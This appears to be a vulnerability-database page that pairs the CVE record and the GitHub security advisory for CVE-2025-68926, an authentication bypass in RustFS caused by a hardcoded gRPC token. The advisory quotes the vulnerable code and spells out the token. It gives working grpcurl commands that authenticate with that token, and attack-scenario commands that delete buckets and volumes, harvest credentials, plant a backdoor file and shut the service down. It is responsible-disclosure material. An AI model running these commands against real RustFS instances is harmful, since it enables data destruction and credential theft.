cvelistv5 - cve-2025-68926

CVE-2025-68926 (GCVE-0-2025-68926)

Vulnerability from cvelistv5 – Published: 2025-12-30 16:59 – Updated: 2025-12-30 17:47

Title

RustFS has a gRPC Hardcoded Token Authentication Bypass

Summary

RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.77, RustFS implements gRPC authentication using a hardcoded static token `"rustfs rpc"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.77 contains a fix for the issue.

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-798 - Use of Hard-coded Credentials
CWE-287 - Improper Authentication

Assigner

GitHub_M

References

URL

Tags

https://github.com/rustfs/rustfs/security/advisor…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	rustfs	rustfs	Affected: < 1.0.0-alpha.77

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-68926",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-30T17:46:43.478972Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-30T17:47:46.836Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "rustfs",
          "vendor": "rustfs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.0.0-alpha.77"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.77, RustFS implements gRPC authentication using a hardcoded static token `\"rustfs rpc\"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.77 contains a fix for the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-798",
              "description": "CWE-798: Use of Hard-coded Credentials",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-287",
              "description": "CWE-287: Improper Authentication",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-30T16:59:53.999Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj"
        }
      ],
      "source": {
        "advisory": "GHSA-h956-rh7x-ppgj",
        "discovery": "UNKNOWN"
      },
      "title": "RustFS has a gRPC Hardcoded Token Authentication Bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-68926",
    "datePublished": "2025-12-30T16:59:53.999Z",
    "dateReserved": "2025-12-24T23:40:31.797Z",
    "dateUpdated": "2025-12-30T17:47:46.836Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-68926\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-30T17:15:43.613\",\"lastModified\":\"2025-12-30T17:15:43.613\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.77, RustFS implements gRPC authentication using a hardcoded static token `\\\"rustfs rpc\\\"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.77 contains a fix for the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-287\"},{\"lang\":\"en\",\"value\":\"CWE-798\"}]}],\"references\":[{\"url\":\"https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68926\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-30T17:46:43.478972Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-30T17:47:39.187Z\"}}], \"cna\": {\"title\": \"RustFS has a gRPC Hardcoded Token Authentication Bypass\", \"source\": {\"advisory\": \"GHSA-h956-rh7x-ppgj\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"rustfs\", \"product\": \"rustfs\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.0.0-alpha.77\"}]}], \"references\": [{\"url\": \"https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj\", \"name\": \"https://github.com/rustfs/rustfs/security/advisories/GHSA-h956-rh7x-ppgj\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.77, RustFS implements gRPC authentication using a hardcoded static token `\\\"rustfs rpc\\\"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.77 contains a fix for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-798\", \"description\": \"CWE-798: Use of Hard-coded Credentials\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-287\", \"description\": \"CWE-287: Improper Authentication\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-30T16:59:53.999Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-68926\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-30T17:47:46.836Z\", \"dateReserved\": \"2025-12-24T23:40:31.797Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-30T16:59:53.999Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-H956-RH7X-PPGJ

Vulnerability from github – Published: 2025-12-30 23:06 – Updated: 2025-12-30 23:06

Summary

RustFS has a gRPC Hardcoded Token Authentication Bypass

Details

Vulnerability Overview

Description

RustFS implements gRPC authentication using a hardcoded static token "rustfs rpc" that is: 1. Publicly exposed in the source code repository 2. Hardcoded on both client and server sides 3. Non-configurable with no mechanism for token rotation 4. Universally valid across all RustFS deployments

Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.

Vulnerable Code Analysis

Server-Side Authentication (rustfs/src/server/http.rs:679-686)

#[allow(clippy::result_large_err)]
fn check_auth(req: Request<()>) -> std::result::Result<Request<()>, Status> {
    let token: MetadataValue<_> = "rustfs rpc".parse().unwrap();  // ⚠️ HARDCODED!

    match req.metadata().get("authorization") {
        Some(t) if token == t => Ok(req),
        _ => Err(Status::unauthenticated("No valid auth token")),
    }
}

Issues: - Static token hardcoded as string literal - No configuration mechanism (environment variable, file, etc.) - Token visible in public GitHub repository - Identical across all installations

Client-Side Authentication (crates/protos/src/lib.rs:153-174)

pub async fn node_service_time_out_client(
    addr: &String,
) -> Result<NodeServiceClient<...>, Box<dyn Error>> {
    let token: MetadataValue<_> = "rustfs rpc".parse()?;  // ⚠️ SAME HARDCODED TOKEN!

    // ...

    Ok(NodeServiceClient::with_interceptor(
        channel,
        Box::new(move |mut req: Request<()>| {
            req.metadata_mut().insert("authorization", token.clone());
            Ok(req)
        }),
    ))
}

Issues: - Client uses identical hardcoded token - No secure token distribution mechanism - Token cannot be rotated without code changes

Service Integration (rustfs/src/server/http.rs:520-521)

let rpc_service = NodeServiceServer::with_interceptor(make_server(), check_auth);
let service = hybrid(s3_service, rpc_service);

The check_auth interceptor is applied to all gRPC services via NodeServiceServer::with_interceptor, protecting all 50+ gRPC methods in node.proto with the same weak authentication.

Reproduction Steps

Environment Setup

Test Environment: - RustFS Server: localhost:9000 (HTTP + gRPC hybrid service) - RustFS Console: localhost:9001 - Container: rustfs/rustfs:latest (Docker Compose deployment) - Default credentials: rustfsadmin/rustfsadmin

Tools Required: - grpcurl v1.9.3+ (gRPC command-line client) - RustFS proto files: crates/protos/src/node.proto

Step 1: Verify Authentication is Enforced

Test 1.1: Request without authentication token

$ grpcurl -plaintext \
    -import-path /private/tmp/rustfs/crates/protos/src \
    -proto node.proto \
    -d '{}' \
    localhost:9000 node_service.NodeService/Ping

Expected Result: ✅ Authentication failure

ERROR:
  Code: Unauthenticated
  Message: No valid auth token

Test 1.2: Request with incorrect token

$ grpcurl -plaintext \
    -H 'authorization: wrong-token-12345' \
    -import-path /private/tmp/rustfs/crates/protos/src \
    -proto node.proto \
    -d '{}' \
    localhost:9000 node_service.NodeService/Ping

Expected Result: ✅ Authentication failure

ERROR:
  Code: Unauthenticated
  Message: No valid auth token

Conclusion: Authentication is properly enforced - unauthorized requests are rejected.

Step 2: Extract Hardcoded Token from Source Code

Public Source Code Analysis:

$ git clone https://github.com/rustfs/rustfs.git
$ cd rustfs
$ grep -rn '"rustfs rpc"' --include='*.rs'

Result: ✅ Token found in public source code

rustfs/src/server/http.rs:680:    let token: MetadataValue<_> = "rustfs rpc".parse().unwrap();
crates/protos/src/lib.rs:153:    let token: MetadataValue<_> = "rustfs rpc".parse()?;

Extracted Token: rustfs rpc

Step 3: Exploit - Authenticate Using Hardcoded Token

Test 3.1: Successful authentication with hardcoded token

$ grpcurl -plaintext \
    -H 'authorization: rustfs rpc' \
    -import-path /private/tmp/rustfs/crates/protos/src \
    -proto node.proto \
    -d '{}' \
    localhost:9000 node_service.NodeService/Ping

Result: 🔓 AUTHENTICATION BYPASSED

{
  "version": "1",
  "body": "DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA=="
}

Analysis: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.

Step 4: Demonstrate Access to Sensitive Management APIs

Test 4.1: Server Configuration Disclosure

$ grpcurl -plaintext \
    -H 'authorization: rustfs rpc' \
    -import-path /private/tmp/rustfs/crates/protos/src \
    -proto node.proto \
    -d '{}' \
    localhost:9000 node_service.NodeService/ServerInfo

Result: ✅ Complete server configuration disclosed

{
  "success": true,
  "serverProperties": "n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA="
}

Analysis: - Server returned complete configuration including storage paths, endpoint addresses, version info - Binary data contains sensitive internal state (MessagePack encoded) - Information disclosure confirmed

Test 4.2: Disk Information Access

$ grpcurl -plaintext \
    -H 'authorization: rustfs rpc' \
    -import-path /private/tmp/rustfs/crates/protos/src \
    -proto node.proto \
    -d '{}' \
    localhost:9000 node_service.NodeService/DiskInfo

Result: ✅ Authenticated request accepted (business logic error returned, not auth error)

{
  "error": {
    "code": 36,
    "errorInfo": "io error can not find disk"
  }
}

Analysis: - Request passed authentication (error is business logic, not authentication) - Proves attacker has authenticated access to sensitive system information APIs

Impact Analysis

Affected APIs

All 50+ gRPC methods in node_service.NodeService are vulnerable:

🔴 CRITICAL Impact - Data Destruction

DeleteBucket - Delete production buckets
DeleteVolume - Destroy entire storage volumes
DeleteUser - Remove legitimate users
DeletePolicy - Remove access control policies
DeleteServiceAccount - Remove service accounts

🔴 CRITICAL Impact - Configuration Manipulation

ReloadSiteReplicationConfig - Corrupt cluster replication
SignalService - Control service lifecycle
LoadPolicy - Modify access control policies
LoadPolicyMapping - Alter policy assignments

🟠 HIGH Impact - Unauthorized Data Access/Modification

ReadAll / ReadAt - Read arbitrary data
WriteAll / WriteStream - Inject malicious data
RenameFile / RenameData - Manipulate file system
UpdateMetadata / WriteMetadata - Corrupt metadata

🟠 HIGH Impact - Privilege Escalation

LoadUser - Access user credentials
LoadServiceAccount - Access service credentials
LoadGroup - Access group memberships

🟡 MEDIUM Impact - Information Disclosure

ServerInfo - Server configuration disclosure
DiskInfo - Storage configuration disclosure
GetMetrics - Performance metrics disclosure
GetBucketStats - Bucket statistics disclosure
LocalStorageInfo - Storage system information
ListBucket - Bucket enumeration

🟡 MEDIUM Impact - Cluster Operations

MakeBucket - Unauthorized bucket creation
HealBucket - Trigger repair operations
BackgroundHealStatus - Monitor internal operations

Attack Scenarios

Scenario 1: Data Destruction

# Enumerate all buckets
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"options": "{}"}' \
  localhost:9000 node_service.NodeService/ListBucket

# Delete critical production bucket
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"bucket": "production-data"}' \
  localhost:9000 node_service.NodeService/DeleteBucket

# Delete entire storage volume
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"volume": "vol1"}' \
  localhost:9000 node_service.NodeService/DeleteVolume

Impact: Complete data loss, business disruption

Scenario 2: Credential Harvesting

# Extract user credentials
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"access_key": "admin"}' \
  localhost:9000 node_service.NodeService/LoadUser

# Extract service account credentials
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"access_key": "service-account"}' \
  localhost:9000 node_service.NodeService/LoadServiceAccount

# Exfiltrate IAM policies
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"name": "admin-policy"}' \
  localhost:9000 node_service.NodeService/LoadPolicy

Impact: Complete IAM compromise, lateral movement

Scenario 3: Backdoor Installation

# Inject malicious data into system paths
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"volume": "config", "path": "backdoor.sh", "buf": "..."}' \
  localhost:9000 node_service.NodeService/WriteAll

# Modify system configuration
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"bucket": "system", "path": ".rustfs.sys/config.json", "fi": "..."}' \
  localhost:9000 node_service.NodeService/WriteMetadata

Impact: Persistent compromise, further exploitation

Scenario 4: Cluster Disruption

# Corrupt replication configuration
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{}' \
  localhost:9000 node_service.NodeService/ReloadSiteReplicationConfig

# Force service restart/shutdown
grpcurl -plaintext -H 'authorization: rustfs rpc' \
  -d '{"sig": 2}' \
  localhost:9000 node_service.NodeService/SignalService

Impact: Distributed system failure, data inconsistency

Exploitation Preconditions

Required Conditions

✅ All conditions typically met in production deployments:

Network Access: Attacker can reach gRPC port (9000/TCP)
RustFS binds to 0.0.0.0 by default (all interfaces)
Commonly exposed for distributed node communication
Token Knowledge: Token is publicly known
Available in public GitHub repository
Identical across all RustFS installations
Cannot be changed without code modification
No Additional Security Controls:
No mTLS/certificate-based authentication
No IP whitelisting (typically)
No VPN/network segmentation requirements
No rate limiting on authentication attempts

Attack Complexity

Complexity: 🟢 TRIVIAL

Single grpcurl command with hardcoded token
No exploit development required
No timing or race conditions
No target-specific reconnaissance needed
Fully automatable
Works against any RustFS instance

Time to Exploit: < 1 minute

Security Impact

Confidentiality Impact: HIGH

Complete Data Disclosure: All stored objects readable via ReadAll/ReadAt
Credential Exposure: IAM users, service accounts, policies accessible
Configuration Disclosure: Server, storage, cluster configuration leaked
Metrics Exposure: Performance and usage metrics accessible

Integrity Impact: HIGH

Data Modification: Arbitrary data injection via WriteAll/WriteStream
Metadata Corruption: File metadata tampering via WriteMetadata
Policy Manipulation: IAM policies modifiable via LoadPolicy
Configuration Changes: Cluster replication config alterable

Availability Impact: HIGH

Data Destruction: Buckets/volumes deletable via DeleteBucket/DeleteVolume
Service Disruption: Service controllable via SignalService
Cluster Degradation: Replication corruption via ReloadSiteReplicationConfig
Resource Exhaustion: Arbitrary data writes, bucket creation

Compliance & Regulatory Impact

Standards Violated

PCI-DSS v4.0

Requirement 6.5.3: Broken authentication
Requirement 8.2: Strong authentication required
Requirement 8.6: Multi-factor authentication required

OWASP Top 10 2021

A07:2021 - Identification and Authentication Failures
Use of hard-coded credentials
Missing or ineffective authentication

NIST Cybersecurity Framework

PR.AC-1: Access control mechanisms violated
PR.AC-7: Authentication mechanisms insufficient

SOC 2 Type II

CC6.1: Logical access controls inadequate
CC6.6: Credential management controls missing

Proof of Concept

Automated POC Script

File: audit_analysis/poc_cve_2025_008_grpc_token_working.sh

Usage:

chmod +x poc_cve_2025_008_grpc_token_working.sh
./poc_cve_2025_008_grpc_token_working.sh [target_host:port]

Default Target: localhost:9000

POC Output Summary

[PHASE 1] Baseline Testing
  ✓ Without token: REJECTED (Unauthenticated)
  ✓ With wrong token: REJECTED (Unauthenticated)

[PHASE 2] Exploit
  ✓ With hardcoded token "rustfs rpc": ACCEPTED ✅

[PHASE 3] Sensitive API Access
  ✓ ServerInfo: SUCCESS - Configuration disclosed
  ✓ DiskInfo: SUCCESS - System information accessible

[RESULT] VULNERABILITY CONFIRMED

Acknowledgements

RustFS would like to thank bilisheep from the Xmirror Security Team for discovering and responsibly reporting this vulnerability.

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "rustfs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.0-alpha.77"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68926"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-798"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-30T23:06:15Z",
    "nvd_published_at": "2025-12-30T17:15:43Z",
    "severity": "CRITICAL"
  },
  "details": "## Vulnerability Overview\n\n### Description\n\nRustFS implements gRPC authentication using a hardcoded static token `\"rustfs rpc\"` that is:\n1. **Publicly exposed** in the source code repository\n2. **Hardcoded** on both client and server sides\n3. **Non-configurable** with no mechanism for token rotation\n4. **Universally valid** across all RustFS deployments\n\nAny attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.\n\n---\n\n## Vulnerable Code Analysis\n\n### Server-Side Authentication (rustfs/src/server/http.rs:679-686)\n\n```rust\n#[allow(clippy::result_large_err)]\nfn check_auth(req: Request\u003c()\u003e) -\u003e std::result::Result\u003cRequest\u003c()\u003e, Status\u003e {\n    let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse().unwrap();  // \u26a0\ufe0f HARDCODED!\n\n    match req.metadata().get(\"authorization\") {\n        Some(t) if token == t =\u003e Ok(req),\n        _ =\u003e Err(Status::unauthenticated(\"No valid auth token\")),\n    }\n}\n```\n\n**Issues**:\n- Static token hardcoded as string literal\n- No configuration mechanism (environment variable, file, etc.)\n- Token visible in public GitHub repository\n- Identical across all installations\n\n### Client-Side Authentication (crates/protos/src/lib.rs:153-174)\n\n```rust\npub async fn node_service_time_out_client(\n    addr: \u0026String,\n) -\u003e Result\u003cNodeServiceClient\u003c...\u003e, Box\u003cdyn Error\u003e\u003e {\n    let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse()?;  // \u26a0\ufe0f SAME HARDCODED TOKEN!\n\n    // ...\n\n    Ok(NodeServiceClient::with_interceptor(\n        channel,\n        Box::new(move |mut req: Request\u003c()\u003e| {\n            req.metadata_mut().insert(\"authorization\", token.clone());\n            Ok(req)\n        }),\n    ))\n}\n```\n\n**Issues**:\n- Client uses identical hardcoded token\n- No secure token distribution mechanism\n- Token cannot be rotated without code changes\n\n### Service Integration (rustfs/src/server/http.rs:520-521)\n\n```rust\nlet rpc_service = NodeServiceServer::with_interceptor(make_server(), check_auth);\nlet service = hybrid(s3_service, rpc_service);\n```\n\nThe `check_auth` interceptor is applied to all gRPC services via `NodeServiceServer::with_interceptor`, protecting **all 50+ gRPC methods** in `node.proto` with the same weak authentication.\n\n---\n\n## Reproduction Steps\n\n### Environment Setup\n\n**Test Environment**:\n- RustFS Server: `localhost:9000` (HTTP + gRPC hybrid service)\n- RustFS Console: `localhost:9001`\n- Container: `rustfs/rustfs:latest` (Docker Compose deployment)\n- Default credentials: `rustfsadmin/rustfsadmin`\n\n**Tools Required**:\n- `grpcurl` v1.9.3+ (gRPC command-line client)\n- RustFS proto files: `crates/protos/src/node.proto`\n\n### Step 1: Verify Authentication is Enforced\n\n**Test 1.1: Request without authentication token**\n\n```bash\n$ grpcurl -plaintext \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/Ping\n```\n\n**Expected Result**: \u2705 Authentication failure\n\n```\nERROR:\n  Code: Unauthenticated\n  Message: No valid auth token\n```\n\n**Test 1.2: Request with incorrect token**\n\n```bash\n$ grpcurl -plaintext \\\n    -H \u0027authorization: wrong-token-12345\u0027 \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/Ping\n```\n\n**Expected Result**: \u2705 Authentication failure\n\n```\nERROR:\n  Code: Unauthenticated\n  Message: No valid auth token\n```\n\n**Conclusion**: Authentication is properly enforced - unauthorized requests are rejected.\n\n---\n\n### Step 2: Extract Hardcoded Token from Source Code\n\n**Public Source Code Analysis**:\n\n```bash\n$ git clone https://github.com/rustfs/rustfs.git\n$ cd rustfs\n$ grep -rn \u0027\"rustfs rpc\"\u0027 --include=\u0027*.rs\u0027\n```\n\n**Result**: \u2705 Token found in public source code\n\n```\nrustfs/src/server/http.rs:680:    let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse().unwrap();\ncrates/protos/src/lib.rs:153:    let token: MetadataValue\u003c_\u003e = \"rustfs rpc\".parse()?;\n```\n\n**Extracted Token**: `rustfs rpc`\n\n---\n\n### Step 3: Exploit - Authenticate Using Hardcoded Token\n\n**Test 3.1: Successful authentication with hardcoded token**\n\n```bash\n$ grpcurl -plaintext \\\n    -H \u0027authorization: rustfs rpc\u0027 \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/Ping\n```\n\n**Result**: \ud83d\udd13 **AUTHENTICATION BYPASSED**\n\n```json\n{\n  \"version\": \"1\",\n  \"body\": \"DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA==\"\n}\n```\n\n**Analysis**: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.\n\n---\n\n### Step 4: Demonstrate Access to Sensitive Management APIs\n\n**Test 4.1: Server Configuration Disclosure**\n\n```bash\n$ grpcurl -plaintext \\\n    -H \u0027authorization: rustfs rpc\u0027 \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto \\\n    -d \u0027{}\u0027 \\\n    localhost:9000 node_service.NodeService/ServerInfo\n```\n\n**Result**: \u2705 **Complete server configuration disclosed**\n\n```json\n{\n  \"success\": true,\n  \"serverProperties\": \"n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA=\"\n}\n```\n\n**Analysis**:\n- Server returned complete configuration including storage paths, endpoint addresses, version info\n- Binary data contains sensitive internal state (MessagePack encoded)\n- Information disclosure confirmed\n\n**Test 4.2: Disk Information Access**\n\n```bash\n$ grpcurl -plaintext \\\n    -H \u0027authorization: rustfs rpc\u0027 \\\n    -import-path /private/tmp/rustfs/crates/protos/src \\\n    -proto node.proto 